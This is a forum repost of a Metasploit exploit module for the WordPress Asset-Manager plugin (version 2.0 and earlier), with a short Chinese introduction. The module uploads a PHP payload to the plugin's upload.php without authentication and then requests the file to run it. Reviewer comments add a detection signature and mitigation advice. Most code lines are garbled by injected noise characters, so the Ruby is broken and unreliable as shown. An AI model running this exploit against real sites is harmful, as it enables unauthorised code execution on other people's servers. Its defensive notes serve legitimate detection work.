这个 Metasploit 模块利用在 WordPress Asset-Manager 插件 2.0 及以下版本中发现的漏洞。该插件允许在没有身份验证的情况下将文件上传到一个临时目录，因此用户可以上传 PHP 文件，从而导致任意代码执行。

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

9 e7 o: X7 {- Z5 d' A5 u, Xrequire 'msf/core'4 A2 X/ k; ]/ n$ f5 T% m
require 'msf/core/exploit/php_exe'$ z; _$ n2 k6 |& J
# WordPress Asset-Manager (<= 2.0) unauthenticated PHP file upload module.
# NOTE(review): this copy was pasted through a forum that injected noise
# characters into most lines; the Ruby below is not runnable as-is and must be
# compared against the upstream Metasploit module before any use.
0 d4 R0 z. C- p `# S3 rclass Metasploit3 < Msf::Exploit::Remote
- ]$ ~2 {' R/ M( d$ l% I& ^ Rank = ExcellentRanking. r$ S/ U5 B. p8 f7 |$ t5 c g8 p3 _- w
# HttpClient supplies send_request_cgi / send_request_raw, rhost/rport and target_uri.
: x- N; @. L2 Y$ `. ^" h include Msf::Exploit::Remote::HttpClient) N' k9 U: R- {
# NOTE(review): the mixin name on the next line is corrupted in this copy; it is the
# mixin loaded by the php_exe require at the top of the file and is what provides
# get_write_exec_payload below.
include Msf::Exploit: hpEXE
7 ^# Q" |: {7 B! \9 _. `
# Module metadata only: name, description, authors, references, payload constraints,
# targets and the TARGETURI option. No network requests are made here.
: ^6 I0 Y7 y. p: z3 l def initialize(info = {})
5 I" ^0 H b$ G5 v super(update_info(info,* b1 L# m! n' T- l8 C
'Name' => 'WordPress Asset-Manager PHP File Upload Vulnerability',
4 {& z V2 g" t! a* d/ g) p: ] R 'Description' => %q{
/ j2 `! [0 L( p4 Z* [& X This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
0 l7 J5 [2 W& v3 S2 Q" _1 _: i plugin. By abusing the upload.php file, a malicious user can upload a file to a
8 n6 _* N p1 Q9 ^ temp directory without authentication, which results in arbitrary code execution.
% w" p9 l' [/ L+ N+ z2 m. z- D },
: Z1 x! Z% _ I, ^! t+ t3 J, B 'Author' =>
7 a& _" X9 e$ G W; z [
9 G( k. Y' U' D# D) j, V 'Sammy FORGIT', # initial discovery9 j( l' j; g8 u" n- F5 a! q
'James Fitts <fitts.james[at]gmail.com>' # metasploit module3 u9 i, ^/ W( K8 ?) [: \
],! p1 F. z; y1 U1 f' R4 @
'License' => MSF_LICENSE,
# Public advisory identifiers for the same issue (OSVDB, BID, Exploit-DB).
! e! `0 p1 f$ p/ h% S7 }1 t, e, y7 Q4 e 'References' =>
2 f2 x c. ~- F+ s6 E [* I/ r8 g% ?+ h+ h1 `( u9 D4 V
[ 'OSVDB', '82653' ],
: B2 Q: f" w# @# ^7 r [ 'BID', '53809' ],/ Z( @7 N* G$ Z; f
[ 'EDB', '18993' ],
; U1 G1 }9 G8 Q( S. q [ 'URL', 'http:// www.myhack58.com /' ]
* Z9 _5 L9 _9 n6 @0 l ],
# NUL is excluded from the payload, presumably because it is embedded in PHP source.
) B$ [! k: ~# Y3 Q+ a 'Payload' =>
3 a& q# O) K; X1 I' P {
* v, K* O6 Y, X# B 'BadChars' => "\x00",
4 _9 P/ h9 W! S, | z9 r6 m0 N/ L3 ` },+ N3 c4 x$ V, h7 ~' g# X
'Platform' => 'php', o' f" v% |! k# t+ T: I, O
'Arch' => ARCH_PHP,9 {/ Y3 _8 `' l7 X4 N7 N' F; y. |
# Two targets: a plain PHP payload (default), and Linux x86 — the latter looks like
# it relies on the write-and-exec wrapper from the PhpEXE mixin; confirm upstream.
'Targets' => ^* w$ k2 L8 Z, p
[
5 l5 ~& q# k" `7 R M% v* s [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
/ J6 s: B3 U* z( ^5 g# q" g [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
4 r$ j: O' D$ V( m% h4 y ],' _4 M# f5 T! O5 u. m, U3 C- L( |
'DefaultTarget' => 0,
" r( W, N$ E/ E, m- L 'DisclosureDate' => 'May 26 2012'))9 q4 T ?7 T0 p5 }; V v( F
) N/ k# c+ J8 Z! N. J
# TARGETURI is the WordPress base path; the plugin and upload paths are appended to it.
register_options(( `6 E$ a8 h0 H# ~5 N/ I: Y F
[- B* j9 Q1 ]9 ]* x7 e- ^
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
$ _: Z6 J+ {. T1 S; o: t& x ], self.class)8 y3 r" ]& V' R) p3 d
end
7 R5 ^( L, H( t- q5 S
# Exploit flow, two unauthenticated HTTP requests (see the description above):
#   1. multipart POST of the generated PHP file to the plugin's upload.php
#   2. GET of that file from wp-content/uploads/assets/temp/ to execute it
# Defender notes: that request pair — a POST to .../plugins/asset-manager/upload.php
# followed shortly by a GET for a five-letter .php name under
# .../uploads/assets/temp/ — is the detection signature in web-server logs. The
# payload is requested with :unlink_self, so the dropped file may not remain on
# disk; treat access logs, not the uploads directory, as the reliable evidence.
# Mitigation: remove or update the plugin and deny script execution under
# wp-content/uploads.
, b0 O/ m4 h/ z/ E: @& }" W def exploit
/ g* p- e0 l% h6 J0 \ uri = target_uri.path2 x, E) }6 q( v, h( B
# Normalise TARGETURI to a trailing slash so the paths below concatenate cleanly.
uri << '/' if uri[-1,1] != '/'
& w% v3 D3 ~/ R! [7 p, y peer = "#{rhost}:#{rport}"
# Random alphabetic basename with a .php extension.
7 l$ d1 q/ X9 V0 c% v S+ Q7 } payload_name = "#{rand_text_alpha(5)}.php"
# PhpEXE builds the PHP stager for the selected target; :unlink_self appears to ask
# it to delete itself after running — TODO confirm against the mixin.
, w! T; c" z4 J2 o( V php_payload = get_write_exec_payload(:unlink_self=>true)
8 o, p' W4 Z0 D9 ~; z$ a
# Hand-built multipart body: a single part named Filedata carrying the .php filename.
0 k6 _" Y$ @* {8 n6 H2 o data = Rex::MIME::Message.new
U# Z8 I- r8 B2 L" Q" s data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
# Strip the CRLF that Rex::MIME::Message#to_s appears to emit before the first boundary.
: J2 t8 _9 k. B5 P7 O# d+ g post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
; ^3 n6 o( k+ K# H" h% D 3 V( o1 a: e0 {1 j
print_status("#{peer} - Uploading payload #{payload_name}")3 [( ~# x7 |$ X' R1 F% G% _' E
res = send_request_cgi({
) H7 M$ `2 ]* _0 }3 A: P. c 'method' => 'POST',
- s& f3 w. a1 _, ~$ n 'uri' => "#{uri}wp-content/plugins/asset-manager/upload.php",
7 r) B, E' N; R: ^" ~' g" ~5 Z2 z* _ 'ctype' => "multipart/form-data; boundary=#{data.bound}",
" t/ E! t0 o) w. v 'data' => post_data3 E) p+ i! N9 F5 ^. N
})) \/ O, D+ A6 b$ O
0 n9 \' ~4 _0 {$ v x* }8 u
# Upload counts as successful only if the response echoes the file name. payload_name
# is purely alphabetic (rand_text_alpha), so interpolating it into the regex is safe.
if not res or res.code != 200 or res.body !~ /#{payload_name}/ [/ }: _5 n$ Q" ^4 {7 m
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
?5 I1 o: N, c/ N: a. D8 Hend
L" C. N$ M; A" {! B( Z ( B& w" Z- G) \( Q# P1 U
print_status("#{peer} - Executing payload #{payload_name}")# {+ S" V, u/ ?' m$ N
res = send_request_raw({
! p6 m0 y1 r( S7 T* x, D4 j 'uri' => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
8 Y+ l! O9 m$ y 'method' => 'GET'7 T& p5 ^, \! n' l7 C/ a2 G
})' T9 l3 u. ]8 A
# A nil response is tolerated here — presumably because a running payload may never
# return a normal HTTP reply — so only an explicit non-200 status is a failure.
* n8 G3 u* j9 q if res and res.code != 200
8 T' b: ^9 I3 W9 ]* p/ \ fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
' z1 j( _" n+ O- e end
1 D( s- i( F0 Y' |6 D; R) ^! p6 ^ end
$ B1 \. U5 w# B# f% r. f+ @end
' J" u1 H1 f; N |